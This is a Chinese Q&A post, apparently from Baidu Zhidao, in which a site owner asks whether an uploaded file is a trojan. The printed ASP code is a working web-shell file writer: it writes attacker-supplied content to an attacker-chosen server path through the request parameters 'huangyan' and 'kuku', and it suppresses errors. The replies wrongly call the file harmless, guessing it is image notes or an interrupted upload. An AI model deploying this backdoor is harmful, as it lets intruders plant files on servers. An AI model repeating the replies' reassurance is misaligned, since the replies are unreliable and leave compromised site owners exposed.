各位老大,我的空间被人上传了这个文件,看下这是不是木马啊

来源:百度知道 编辑:UC知道 时间:2024/05/14 07:25:56
各位老大,我的空间被人上传了这个文件,看下这是不是木马啊?

<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("huangyan"))<>"" then %>
<% fdata = request("kuku") %>
<% Set objCountFile=objFSO.CreateTextFile(request("huangyan"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>!</font>" %>
<% else %>
<% response.write "<font color=red>@</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='&#

"huangyan" 和 "kuku" 是什么?

font color=red 字体颜色为red?

input type=submit value=保存>" % 还会保存?

可能是某个东东的信息,被中途关闭留下的.......

不是吧,好像是用来显示一些文字,而且可以保存的,可能是图片的备注,不用担心的!

会不会是图片传一半,您退出了?